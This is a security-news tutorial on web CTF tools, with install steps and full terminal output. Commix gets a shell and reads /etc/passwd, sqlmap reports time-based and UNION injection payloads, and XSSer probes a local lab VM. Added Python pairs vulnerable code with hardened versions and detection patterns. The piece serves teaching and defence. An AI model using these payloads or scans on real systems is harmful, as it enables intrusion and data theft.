Top TOOLS for Web Application CTF (Capture the Flag)
Information Security Newspaper | Hacking News (https://www.securitynewspaper.com), Tue, 22 Oct 2019 02:50:16 +0000
https://www.securitynewspaper.com/2019/10/21/top-tools-for-web-application-ctf-capture-the-flag/

Here you will find the most common tools used in capture-the-flag challenges. The tools listed below are used for web application testing.

Burpsuite

Burpsuite is a GUI-based tool used to intercept HTTP traffic. It is written in Java and created by PortSwigger Web Security. It is widely used by pentesters, security researchers and CTF players. According to the ethical hacking researcher of International Institute of Cyber Security, Burpsuite bundles many smaller tools, such as the scanner, intruder and spider, for scanning a URL.

Burpsuite Tools

  • HTTP Proxy – Works as a web proxy server, placing Burpsuite as a man in the middle (MITM) between the web browser and the target web server.
  • Scanner – Automates scanning of the web application.
  • Intruder – Automates attacks against the web application, with pre-written algorithms for generating malicious HTTP requests.
  • Spider – Crawls the website; used during manual mapping to speed up discovery of application functionality.
  • Repeater – Modifies and re-sends individual requests to the server.
  • Decoder – Transforms raw data into encoded and hashed forms and back; it can also recognise encoding formats.
  • Comparer – Compares two items (for example two requests or responses) of the web application.
  • Extender – Loads extensions that extend Burpsuite's functionality.
  • Sequencer – Analyses the randomness of data items, mostly application session tokens and other values that should be unpredictable.

Commix

Commix is another tool used by security researchers and CTF players to automate web application testing. It is designed to find command injection vulnerabilities. An attacker can also use commix to upload shells, such as malicious PHP shells, or to obtain a session through Metasploit.

  • For testing you can use any of several Linux distros:
    • ArchStrike
    • BlackArch Linux
    • BackBox
    • Kali Linux
    • Parrot Security OS
    • Pentoo Linux
    • Weakerthan Linux
  • We are using Kali Linux 2019.1 amd64. Open a terminal and type git clone https://github.com/commixproject/commix.git
  • Type cd commix && ls
  • Type python commix.py --help
  • We will show a command injection attack.
  • For testing we will use the Web for Pentester VM. Download it from https://www.vulnhub.com/entry/pentester-lab-web-for-pentester,71/
  • Download web_for_pentester_i386.iso and run the ISO as a live boot.
  • Now, from the Kali machine, type python commix.py --url https://192.168.1.6/commandexec/example1.php?ip=127.0.0.1
    • where 192.168.1.6 is the IP address of the running Web for Pentester ISO.
    • --url assigns the target URL. We have used Web for Pentester example 1.
    • Because the above URL has a command injection vulnerability, it is easy to get a reverse shell.
    • Many CTF challenges need commix to get a reverse shell; commix can also be used for SQL injection attacks.
    • Commix uses the payload ;echo OHJXJE$((9+49))$(echo OHJXJE)OHJXJE to confirm the injection and obtain a reverse shell for the attacker.
    • After getting the shell, type ls, then cat%20/etc/passwd to display the passwd file stored on the target.
root@kali:/home/iicybersecurity/Downloads/commix# python commix.py --url https://192.168.1.6/commandexec/example1.php?ip=127.0.0.1
 +--
 Automated All-in-One OS Command Injection and Exploitation Tool
 Copyright © 2014-2019 Anastasios Stasinopoulos (@ancst)
 +--
 (!) Legal disclaimer: Usage of commix for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.
 [] Checking connection to the target URL… [ SUCCEED ] [] Setting the GET parameter 'ip' for tests.
 [*] Testing the (results-based) classic command injection technique… [ SUCCEED ]
 [+] The GET parameter 'ip' seems injectable via (results-based) classic command injection technique.
     [~] Payload: ;echo OHJXJE$((9+49))$(echo OHJXJE)OHJXJE
 [?] Do you want a Pseudo-Terminal shell? [Y/n] > y
 Pseudo-Terminal (type '?' for available options)
 commix(os_shell) > ls
 example1.php example2.php example3.php index.html
 commix(os_shell) >
commix(os_shell) > cat%20/etc/passwd
 root:x:0:0:root:/root:/bin/bash
 daemon:x:1:1:daemon:/usr/sbin:/bin/sh
 bin:x:2:2:bin:/bin:/bin/sh
 sys:x:3:3:sys:/dev:/bin/sh
 sync:x:4:65534:sync:/bin:/bin/sync
 games:x:5:60:games:/usr/games:/bin/sh
 man:x:6:12:man:/var/cache/man:/bin/sh
 lp:x:7:7:lp:/var/spool/lpd:/bin/sh
 mail:x:8:8:mail:/var/mail:/bin/sh
 news:x:9:9:news:/var/spool/news:/bin/sh
 uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
 proxy:x:13:13:proxy:/bin:/bin/sh
 www-data:x:33:33:www-data:/var/www:/bin/sh
 backup:x:34:34:backup:/var/backups:/bin/sh
 list:x:38:38:Mailing List Manager:/var/list:/bin/sh
 irc:x:39:39:ircd:/var/run/ircd:/bin/sh
 gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
 nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
 libuuid:x:100:101::/var/lib/libuuid:/bin/sh
 mysql:x:101:103:MySQL Server,,,:/var/lib/mysql:/bin/false
 sshd:x:102:65534::/var/run/sshd:/usr/sbin/nologin
 openldap:x:103:106:OpenLDAP Server Account,,,:/var/lib/ldap:/bin/false
 user:x:1000:1000:Debian Live user,,,:/home/user:/bin/bash
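The commix run above succeeds because the ip parameter is pasted into a shell command. The following Python is an added example (it is not code from the article or from commix) showing the two things a defender wants from this section: the vulnerable build-a-shell-string pattern beside a hardened version that validates the value as an IP address and passes an argument vector, and a log check that flags requests whose parameters carry shell metacharacters, run over constructed access-log lines that include the page's own OHJXJE probe. The log lines, client addresses and function names are assumptions.

```python
"""Command injection: vulnerable vs hardened handler, plus log detection.

Added example, not part of the article or of commix. The access-log
lines below are constructed to resemble requests to the lab target's
/commandexec/example1.php?ip= endpoint.
"""
import ipaddress
import re
from urllib.parse import parse_qs, urlsplit

# Shell metacharacters that have no legitimate place in an IP-address field.
METACHARS = re.compile(r"[;&|`$(){}<>\n]")


def build_ping_command_vulnerable(ip: str) -> str:
    # Handed to a shell as one string, so a ';' in `ip` ends the ping and
    # starts a second command chosen by the client.
    return "ping -c 1 " + ip


def build_ping_command_safe(ip: str) -> list:
    """Validate the value as an IP address and return an argv list.

    ipaddress.ip_address() raises ValueError for anything that is not a
    literal IPv4/IPv6 address, so metacharacters never reach a command.
    The list form is meant for subprocess.run(..., shell=False), where
    each element is one argument and nothing is interpreted by a shell.
    """
    addr = ipaddress.ip_address(ip.strip())
    return ["ping", "-c", "1", str(addr)]


def is_safe_ip(value: str) -> bool:
    """True if `value` would be accepted by the hardened handler."""
    try:
        build_ping_command_safe(value)
        return True
    except ValueError:
        return False


def request_params(log_line: str) -> dict:
    """Query parameters (percent-decoded) from an Apache combined-format line."""
    request = log_line.split('"')[1]          # 'GET /path?x=y HTTP/1.1'
    target = request.split(" ")[1]
    return {k: v[0] for k, v in parse_qs(urlsplit(target).query).items()}


def flag_injection_attempts(log_lines):
    """Return (client, parameter, decoded value) for every parameter that
    contains shell metacharacters."""
    hits = []
    for line in log_lines:
        client = line.split(" ", 1)[0]
        for param, value in request_params(line).items():
            if METACHARS.search(value):
                hits.append((client, param, value))
    return hits


# Constructed sample log: one benign request, one carrying the commix probe
# (URL-encoded form of ;echo OHJXJE$((9+49))$(echo OHJXJE)OHJXJE), one benign.
SAMPLE_LOG = [
    '192.168.1.9 - - [05/Oct/2019:08:09:58 +0000] "GET /commandexec/example1.php?ip=127.0.0.1 HTTP/1.1" 200 214',
    '192.168.1.9 - - [05/Oct/2019:08:10:01 +0000] "GET /commandexec/example1.php'
    '?ip=127.0.0.1%3Becho%20OHJXJE%24%28%289%2B49%29%29%24%28echo%20OHJXJE%29OHJXJE HTTP/1.1" 200 231',
    '192.168.1.12 - - [05/Oct/2019:08:10:07 +0000] "GET /commandexec/example1.php?ip=10.0.0.5 HTTP/1.1" 200 214',
]

if __name__ == "__main__":
    for client, param, value in flag_injection_attempts(SAMPLE_LOG):
        print(f"{client} sent metacharacters in '{param}': {value!r}")
```

The detection is deliberately narrow (metacharacters in a field that should only ever hold an address); the fix that actually removes the bug is the argv-list plus `ipaddress` validation, which rejects the payload before any process is started.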

Hackbar

Hackbar is a web browser utility used to encode and decode data in different hash and encoding formats. It is available as a Mozilla Firefox extension. Download hackbar from: https://addons.mozilla.org/en-US/firefox/addon/hackbartool/

  • Install hackbar. After installing, configure a license. The tool has a 3-month free trial; after that you have to pay to keep using hackbar.
  • Open any URL in Firefox, press F12 and click on hackbar. Click on Load URL.
  • Then you can use the different options for encoding or decoding hashes. For example, we have opened hackthissite.org.
  • You can click the different options for base64 encode or decode. Hackbar also provides MySQL encoding.
  • Hackbar also offers options to convert hex into MySQL format.

OWASP-ZAP

The OWASP ZAP tool is used to scan web applications and works much like Burpsuite. It has to be configured the same way: you give the same localhost proxy address to OWASP ZAP and to Firefox. The tool comes pre-installed in Kali Linux, and you can also install it on Windows. It is one of the world's most widely used free security tools and is maintained by many volunteers. These tools are covered as part of the ethical hacking courses offered by International Institute of Cyber Security.

  • Download the tool from: https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project
  • The screenshot above shows OWASP ZAP intercepting HTTP traffic. When we opened hackthissite.org, OWASP ZAP started intercepting the traffic for that URL.
  • The screenshot above shows the directories found under the URL. OWASP ZAP is very popular among pentesters and security researchers and is also used in CTF challenges.

POSTMAN

Postman is used to debug web application requests. Pentesters and security researchers use Postman to inspect GET, POST and many other request types for any web application, and the tool itself offers many features for web application testing. When you enter a URL in an untitled request, Postman shows its cookies, headers, domain, SSL verification and even the path. You can also open the website inside Postman. Download the tool from: https://www.getpostman.com/

The screenshot above shows the cookies of youtube.com with their expiry dates and values. In many CTF challenges Postman can be used to check the target web application's behaviour, as it does not need any configuration with the web browser.

RACCOON

Raccoon is another security tool for reconnaissance and vulnerability scanning. It uses initial-phase networking tools to scan web applications. Raccoon provides DNS details, WHOIS information, TLS data, subdomain information, WAF detection and many other features needed when gathering information about a web application.

  • For testing we are using Kali Linux 2019.1 amd64.
  • Open a terminal and type git clone https://github.com/evyatarmeged/Raccoon.git
  • Type cd Raccoon && ls
  • Make sure python3 is installed on your system.
  • If not, type sudo apt-get update && sudo apt-get install python3 python3-pip
  • Type pip3 install raccoon-scanner, then python setup.py install
  • Type python setup.py develop
  • Type raccoon hackthissite.org
root@kali:/home/iicybersecurity/Downloads/Raccoon# raccoon hackthissite.org
 4841434b414c4c5448455448494e4753
 https://github.com/evyatarmeged/Raccoon
 Raccoon Scan Started
 [#] Trying to gather information about host: hackthissite.org
 [!] Found hackthissite.org to be a naked domain
 [v] Writing DNS query results
 [#] Setting Nmap scan to run in the background
 [#] Nmap script to run: nmap -Pn hackthissite.org
 [v] Nmap scan started
 [#] Started collecting TLS data for hackthissite.org
 [#] Trying to detect WAF presence in hackthissite.org
 [v] Nmap discovered the following ports:
         22/tcp closed ssh
         80/tcp open http
         443/tcp open https
 [v] Did not detect WAF presence in target
 [#] Trying to collect hackthissite.org web application data
 [v] Found robots.txt
 [v] Web server detected: HackThisSite
 [v] Cookie: {PHPSESSID} - both secure and HttpOnly flags are not set
 [!] 2 fuzzable URLs discovered
 [!] 1 HTML forms discovered
 [#] Trying to fetch DNS Mapping for hackthissite.org from DNS dumpster
 [v] Successfully fetched DNS mapping for hackthissite.org
 [v] hackthissite.org WHOIS information retrieved
 [#] Done collecting TLS data
 [v] Supported Ciphers:
 |   TLSv1.2:
 |     ciphers:
 |       TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384 (secp256r1) - A
 |       TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 (secp256r1) - A
 |       TLS_ECDHE_RSA_WITH_AES_256_CBC_SHA384 (secp256r1) - A
 |       TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA256 (secp256r1) - A
 |       TLS_RSA_WITH_AES_256_GCM_SHA384 (rsa 4096) - A
 |       TLS_RSA_WITH_AES_128_GCM_SHA256 (rsa 4096) - A
 |       TLS_RSA_WITH_AES_256_CBC_SHA256 (rsa 4096) - A
 |       TLS_RSA_WITH_AES_128_CBC_SHA256 (rsa 4096) - A
 |     compressors:
 |       NULL
 |     cipher preference: server
 |     warnings:
 |       Key exchange (secp256r1) of lower strength than certificate key
 |_  least strength: A
 [x] Could not get a response from hackthissite.org. Maybe target is down ?
 [#] Enumerating Subdomains
 [!] Trying to find Subdomains in SANs list
 [!] Trying to discover subdomains in Google
 [v] Detected subdomain through Google dorking: status.hackthissite.org
 [v] Detected subdomain through Google dorking: irc.hackthissite.org
 [v] Detected subdomain through Google dorking: Radioradio.hackthissite.org
 [v] Detected subdomain through Google dorking: v3dev.hackthissite.org
 [v] Detected subdomain through Google dorking: CryptoPastepaste.hackthissite.org
 [v] Detected subdomain through Google dorking: HackThisSitev3stage.hackthissite.org
 [v] Detected subdomain through Google dorking: ctf.hackthissite.org
 [v] Detected subdomain through Google dorking: legal.hackthissite.org
 [v] Detected subdomain through Google dorking: forums.hackthissite.org
 [v] Detected subdomain through Google dorking: paste.hackthissite.org
 [!] Trying to extract subdomains from DNS dumpster
 [x] Failed to query DNS dumpster for subdomains
 [!] Bruteforcing subdomains
 [#] Reading from list: /usr/local/lib/python3.7/dist-packages/raccoon_src/wordlists/subdomains
         [301] https://WWW.hackthissite.org redirects to https://www.hackthissite.org/
         [301] https://advertising.hackthissite.org redirects to https://advertising.hackthissite.org/
         [301] https://pi.hackthissite.org redirects to https://pi.hackthissite.org/
         [200] https://tor.hackthissite.org
         [301] https://hp.hackthissite.org redirects to https://hp.hackthissite.org/
         [500] https://git.hackthissite.org
         [301] https://stats.hackthissite.org redirects to https://stats.hackthissite.org/
         [301] https://irc.hackthissite.org redirects to https://www.irc.hackthissite.org/
         [200] https://mirror.hackthissite.org
         [301] https://forum.hackthissite.org redirects to https://forum.hackthissite.org/
         [301] https://forums.hackthissite.org redirects to https://forums.hackthissite.org/
         [200] https://radio.hackthissite.org
         [301] https://status.hackthissite.org redirects to https://status.hackthissite.org/
         [301] https://legal.hackthissite.org redirects to https://legal.hackthissite.org/
 [#] Done enumerating Subdomains
 Raccoon scan finished
  • As you can see, Raccoon has gathered a lot of initial-phase information about the web application, a good start for a CTF challenge. Such a tool can be used to gather information about target URLs, as suggested by the ethical hacking researcher of International Institute of Cyber Security.

SQLMAP

SqlMap is used for detecting and exploiting SQL injection flaws and taking control of the underlying database servers. It comes with a powerful detection engine and can be used for anything from accessing the database to executing commands on the operating system. SqlMap supports many database products, and the tool is fairly easy to use.

  • Open a terminal and type git clone https://github.com/sqlmapproject/sqlmap.git
  • Type cd sqlmap
  • For testing we are using the Web for Pentester VM.
  • Then type python sqlmap.py -u https://192.168.1.6/sqli/example1.php?name=root
  • -u specifies the target URL carrying the SQL parameter.
root@kali:/home/iicybersecurity/Downloads/sqlmap# python sqlmap.py -u https://192.168.1.6/sqli/example1.php?name=root
 [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
 [*] starting @ 08:11:51 /2019-10-05/
 [08:11:51] [INFO] testing connection to the target URL
 [08:11:51] [INFO] checking if the target is protected by some kind of WAF/IPS
 [08:11:51] [INFO] testing if the target URL content is stable
 [08:11:52] [INFO] target URL content is stable
 [08:11:52] [INFO] testing if GET parameter 'name' is dynamic
 [08:11:52] [WARNING] GET parameter 'name' does not appear to be dynamic
 [08:11:52] [WARNING] heuristic (basic) test shows that GET parameter 'name' might not be injectable
 [08:11:52] [INFO] testing for SQL injection on GET parameter 'name'
 [08:11:52] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
 [08:11:52] [INFO] testing 'Boolean-based blind - Parameter replace (original value)'
 [08:11:52] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
 [08:11:52] [INFO] testing 'PostgreSQL AND error-based - WHERE or HAVING clause'
 [08:11:52] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
 [08:11:52] [INFO] testing 'Oracle AND error-based - WHERE or HAVING clause (XMLType)'
 [08:11:52] [INFO] testing 'MySQL >= 5.0 error-based - Parameter replace (FLOOR)'
 [08:11:52] [INFO] testing 'MySQL inline queries'
 [08:11:52] [INFO] testing 'PostgreSQL inline queries'
 [08:11:52] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
 [08:11:52] [INFO] testing 'PostgreSQL > 8.1 stacked queries (comment)'
 [08:11:52] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
 [08:11:52] [INFO] testing 'Oracle stacked queries (DBMS_PIPE.RECEIVE_MESSAGE - comment)'
 [08:11:53] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)'
 [08:12:03] [INFO] GET parameter 'name' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
 it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
 for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
 [08:12:30] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
 [08:12:30] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
 [08:12:30] [CRITICAL] connection dropped or unknown HTTP status code received. Try to force the HTTP User-Agent header with option '--user-agent' or switch '--random-agent'. sqlmap is going to retry the request(s)
 [08:12:30] [WARNING] most likely web server instance hasn't recovered yet from previous timed based payload. If the problem persists please wait for a few minutes and rerun without flag 'T' in option '--technique' (e.g. '--flush-session --technique=BEUS') or try to lower the value of option '--time-sec' (e.g. '--time-sec=2')
 [08:12:30] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
 [08:12:30] [INFO] target URL appears to have 5 columns in query
 [08:12:30] [INFO] GET parameter 'name' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
 GET parameter 'name' is vulnerable. Do you want to keep testing the others (if any)? [y/N] Y
 sqlmap identified the following injection point(s) with a total of 63 HTTP(s) requests:
 Parameter: name (GET)
     Type: time-based blind
     Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
     Payload: name=root' AND (SELECT 3961 FROM (SELECT(SLEEP(5)))bdhc) AND 'COlc'='COlc
 Type: UNION query Title: Generic UNION query (NULL) - 5 columns
     Payload: name=root' UNION ALL SELECT CONCAT(0x71706b6a71,0x5a55635463736c696748594a4754536d77756154674f53486f6b634e5a636c524b6c526756685043,0x717a766b71),NULL,NULL,NULL,NULL-- ENow
 [08:12:41] [INFO] the back-end DBMS is MySQL
 web server operating system: Linux Debian 6.0 (squeeze)
 web application technology: PHP 5.3.3, Apache 2.2.16
 back-end DBMS: MySQL >= 5.0.12
 [08:12:41] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.1.6'
 [*] ending @ 08:12:41 /2019-10-05/
  • The output above shows sqlmap working through its list of payloads to detect which DBMS the target is using; sqlmap found that the target is using MySQL >= 5.0.12.
  • Then sqlmap sent the UNION query payload to the target and saved the output in its output location.
  • Type cd /root/.sqlmap/output/192.168.1.6 && ls
root@kali:~/.sqlmap/output/192.168.1.6# ls
 log  session.sqlite  target.txt
root@kali:~/.sqlmap/output/192.168.1.6# cat target.txt
 https://192.168.1.6/sqli/example1.php?name=root (GET)  # sqlmap.py -u https://192.168.1.6/sqli/example1.php?name=root
 root@kali:~/.sqlmap/output/192.168.1.6#
 root@kali:~/.sqlmap/output/192.168.1.6#
 root@kali:~/.sqlmap/output/192.168.1.6# cat log
 sqlmap identified the following injection point(s) with a total of 63 HTTP(s) requests:
 Parameter: name (GET)
     Type: time-based blind
     Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
     Payload: name=root' AND (SELECT 3961 FROM (SELECT(SLEEP(5)))bdhc) AND 'COlc'='COlc
 Type: UNION query Title: Generic UNION query (NULL) - 5 columns
     Payload: name=root' UNION ALL SELECT CONCAT(0x71706b6a71,0x5a55635463736c696748594a4754536d77756154674f53486f6b634e5a636c524b6c526756685043,0x717a766b71),NULL,NULL,NULL,NULL-- ENow
 web server operating system: Linux Debian 6.0 (squeeze)
 web application technology: PHP 5.3.3, Apache 2.2.16
 back-end DBMS: MySQL >= 5.0.12
  • Above you can see the sqlite session file and the log. In SQL injection CTFs you can use such methods.
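The two payloads sqlmap reported work only because the name parameter is concatenated into the SQL text. The following Python is an added example (not code from the article or from sqlmap) that puts the vulnerable query next to a parameterised one against an in-memory SQLite table with constructed rows, so the effect of a UNION payload in the shape sqlmap printed can be seen without the lab VM, and adds a small classifier that recognises both payload shapes from the output above. The table layout, the secrets table and the regex names are assumptions; the time-based payload is only classified, since SQLite has no SLEEP().

```python
"""SQL injection: string concatenation beside a parameterised query, plus a
classifier for the payload shapes sqlmap reported.

Added example, not code from the article or from sqlmap. The database and
its rows are constructed for the demonstration.
"""
import re
import sqlite3


def make_db():
    """Constructed schema: a users table the app queries, and a table it never should expose."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER, name TEXT, age INTEGER, groupid INTEGER)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?, ?)",
                     [(1, "root", 32, 1), (2, "hacker", 25, 2)])
    conn.execute("CREATE TABLE secrets (flag TEXT)")
    conn.execute("INSERT INTO secrets VALUES ('FLAG{constructed-sample}')")
    return conn


def lookup_vulnerable(conn, name):
    # The value is spliced into the SQL text: a quote in the input closes the
    # literal and everything after it is parsed as SQL.
    sql = f"SELECT id, name, age, groupid FROM users WHERE name = '{name}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn, name):
    # A bound parameter travels as data; the engine never parses it as SQL,
    # so the same payload simply matches no user.
    sql = "SELECT id, name, age, groupid FROM users WHERE name = ?"
    return conn.execute(sql, (name,)).fetchall()


# Payload shapes from the sqlmap output above. The UNION one is adapted to
# this table: the column count must match the original query (four here) and
# the trailing comment swallows the closing quote.
UNION_PAYLOAD = "root' UNION ALL SELECT NULL, flag, NULL, NULL FROM secrets-- "
TIME_PAYLOAD = "root' AND (SELECT 3961 FROM (SELECT(SLEEP(5)))bdhc) AND 'COlc'='COlc"

SQLI_MARKERS = [
    ("union-select", re.compile(r"'\s*UNION\s+(?:ALL\s+)?SELECT\b", re.I)),
    ("time-delay", re.compile(r"\bSLEEP\s*\(|\bWAITFOR\s+DELAY\b|\bpg_sleep\s*\(", re.I)),
    ("tautology", re.compile(r"\b(?:AND|OR)\s+'\w+'\s*=\s*'\w+", re.I)),
]


def classify_sqli(value):
    """Names of the injection patterns present in a parameter value (empty for benign input)."""
    return [name for name, rx in SQLI_MARKERS if rx.search(value)]


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", lookup_vulnerable(db, UNION_PAYLOAD))
    print("safe:      ", lookup_safe(db, UNION_PAYLOAD))
    for p in (UNION_PAYLOAD, TIME_PAYLOAD, "root"):
        print(classify_sqli(p), p)
```

The vulnerable lookup returns the root row plus a row carrying the flag from the other table; the parameterised lookup returns nothing for the same input. The classifier is a triage aid for logs and WAF tuning, not a substitute for binding parameters.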

W3AF

W3af is used in web application testing and helps developers and pentesters find and exploit vulnerabilities in web applications. It is popular among pentesters and security researchers and is able to find 200+ vulnerabilities. For further installation and usage instructions for w3af, go to this link.

XSSER

Xsser is an automation framework designed to detect and exploit cross-site scripting (XSS) attacks. Cross-site scripting is among the most common vulnerabilities found in web applications, and Xsser is used in CTF challenges.

  • Open a terminal and type git clone https://github.com/epsylon/xsser.git
  • Type cd xsser && ls
  • Type pip install geoip && pip install BeautifulSoup
  • Type ./xsser -h to list the options. For testing we will use the Web for Pentester VM.
  • Type ./xsser -u https://192.168.1.3/xss/example1.php?name=hacker -c 30
  • -u is the target URL.
  • -c sets the maximum number of URLs xsser will crawl (here 30).
root@kali:/home/iicybersecurity/Downloads/xsser# ./xsser -u https://192.168.1.3/xss/example1.php?name=hacker -c 30
 /usr/local/lib/python2.7/dist-packages/BeautifulSoup.py:114: UserWarning: You are using a very old release of Beautiful Soup, last updated in 2011. If you installed the 'beautifulsoup' package through pip, you should know the 'beautifulsoup' package name is about to be reclaimed by a more recent version of Beautiful Soup which is incompatible with this version.
 This will happen at some point after January 1, 2021.
 If you just started this project, this is easy to fix. Install the 'beautifulsoup4' package instead of 'beautifulsoup' and start using Beautiful Soup 4.
 If this is an existing project that depends on Beautiful Soup 3, the project maintainer (potentially you) needs to start the process of migrating to Beautiful Soup 4. This should be a relatively easy part of the Python 3 migration.
   """)
 XSSer v1.8[1]: "The Hive!" - (https://xsser.03c8.net) - 2010/2019 -> by psy
 ===========================================================================
 Testing [XSS from CRAWLER]…
 [Info] Crawlering TARGET: https://192.168.1.3/xss/example1.php?name=hacker
 Max. limit: 30
 Deep level: 2 
 [Info] Found enough results… calling all mosquitoes to home!
 
 [Info] Mosquitoes have found: [ 32 ] possible attacking vector(s)
 ===========================================================================
 [*] Test: [ 1/8 ] <-> 2019-10-05 11:15:33.667754
 [+] Target:
 [ https://192.168.1.3/xss/example7.php?name=XSS ]
 
 [!] Hashing:
 [ 7603b81cd0a8a7dee0f732aaef3a9edc ] : [ name ]
 
 [*] Trying:
 https://192.168.1.3/xss/example7.php?name=%22%3E7603b81cd0a8a7dee0f732aaef3a9edc
 
 [+] Vulnerable(s):
 [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
 
 =============================================
 [*] Injection(s) Results:
 [ FOUND! ] -> [ 7603b81cd0a8a7dee0f732aaef3a9edc ] : [ name ] -> [ ">PAYLOAD ]
 ===========================================================================
 [*] Test: [ 2/10 ] <-> 2019-10-05 11:15:33.667754
 [+] Target:
 [ https://192.168.1.3/sqli/example4.php?id=XSS ]
 
 [!] Hashing:
 [ 299ef6903c27e1e10e7fef08c32d8aee ] : [ id ]
 
 [*] Trying:
 https://192.168.1.3/sqli/example4.php?id=%22%3E299ef6903c27e1e10e7fef08c32d8aee
 
 [+] Vulnerable(s):
 [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
 
 =============================================
 [*] Injection(s) Results:
 [ NOT-FOUND ] -> [ 299ef6903c27e1e10e7fef08c32d8aee ] : [ id ]
 ===========================================================================
 [*] Test: [ 3/10 ] <-> 2019-10-05 11:15:33.667754
 [+] Target:
 [ https://192.168.1.3/codeexec/example2.php?order=XSS ]
 
 [!] Hashing:
 [ b0801c83a5dbb2ec41bec856f2ab8c52 ] : [ order ]
 
 [*] Trying:
 https://192.168.1.3/codeexec/example2.php?order=%22%3Eb0801c83a5dbb2ec41bec856f2ab8c52
 
 [+] Vulnerable(s):
 [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
 
 =============================================
 [*] Injection(s) Results:
 [ NOT-FOUND ] -> [ b0801c83a5dbb2ec41bec856f2ab8c52 ] : [ order ]
 ===========================================================================
 [*] Test: [ 4/10 ] <-> 2019-10-05 11:15:33.667754
 [+] Target:
 [ https://192.168.1.3/xss/example6.php?name=XSS ]
 
 [!] Hashing:
 [ 78ef2f4bcef9a54245bc54689514f5a3 ] : [ name ]
 
 [*] Trying:
 https://192.168.1.3/xss/example6.php?name=%22%3E78ef2f4bcef9a54245bc54689514f5a3
 
 [+] Vulnerable(s):
 [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
 
 =============================================
 [*] Injection(s) Results:
 [ FOUND! ] -> [ 78ef2f4bcef9a54245bc54689514f5a3 ] : [ name ] -> [ ">PAYLOAD ]
 ===========================================================================
 [*] Test: [ 5/10 ] <-> 2019-10-05 11:15:33.667754
 [+] Target:
 [ https://192.168.1.3/xss/example8.php/XSS ]
 
 [!] Hashing:
 [ 4a3169d21a3088cd83bf366130d6d3db ] : [ https://192.168.1.3/xss/example8.php/XSS ]
 
 [*] Trying:
 https://192.168.1.3/xss/example8.php/">4a3169d21a3088cd83bf366130d6d3db
 
 [+] Vulnerable(s):
 [IE7.0|IE6.0|NS8.1-IE] [NS8.1-G|FF2.0] [O9.02]
 
  • The results above show that the target is vulnerable to XSS and can be exploited with XSS payloads.
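XSSer's check above is simple: it sends a unique marker prefixed with `">` (the %22%3E in its test URLs) and looks for the marker coming back unescaped. The Python below is an added example, not code from the article or from XSSer, that reproduces that check locally against two constructed page templates, one that interpolates the parameter raw into an attribute and one that HTML-escapes it, so the reader can see what the fix looks like and why the probe stops matching. The templates, marker length and function names are assumptions.

```python
"""Reflected XSS: raw interpolation beside context-aware escaping, with the
marker-reflection check XSSer's output above is based on.

Added example, not code from the article or from XSSer. The HTML templates
are constructed stand-ins for the lab pages.
"""
import html
import secrets

PROBE = '">'   # attribute-breaking prefix seen as %22%3E in the test URLs above


def render_vulnerable(name: str) -> str:
    # The value is interpolated raw into an attribute; a leading '">' closes
    # the attribute and the tag, and whatever follows becomes markup.
    return f'<input type="text" name="name" value="{name}">'


def render_safe(name: str) -> str:
    # html.escape(quote=True) turns & < > " ' into entities, so the value can
    # never leave the attribute context it was placed in.
    return f'<input type="text" name="name" value="{html.escape(name, quote=True)}">'


def new_marker() -> str:
    """Random 32-hex-character marker, the same shape as the hashes XSSer printed."""
    return secrets.token_hex(16)


def reflects_unescaped(body: str, marker: str, probe: str = PROBE) -> bool:
    """True if probe+marker reached the page verbatim, i.e. the probe was not encoded."""
    return (probe + marker) in body


def check_reflection(render, probe: str = PROBE) -> bool:
    """Send probe+marker through a render function and report whether it reflects unescaped."""
    marker = new_marker()
    body = render(probe + marker)
    return reflects_unescaped(body, marker, probe)


if __name__ == "__main__":
    print("vulnerable template reflects:", check_reflection(render_vulnerable))
    print("escaped template reflects:   ", check_reflection(render_safe))
    print(render_safe('">x'))
```

Escaping must match the output context: `html.escape` is right for text nodes and quoted attributes, but a value written into a `<script>` block or a URL needs that context's encoder instead.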

Mr. Robot 1 – Capture The Flag Challenge, walk through
Information Security Newspaper | Hacking News, Tue, 01 Oct 2019 12:22:53 +0000
https://www.securitynewspaper.com/2019/10/01/mr-robot-1-capture-the-flag-challenge-walk-through/

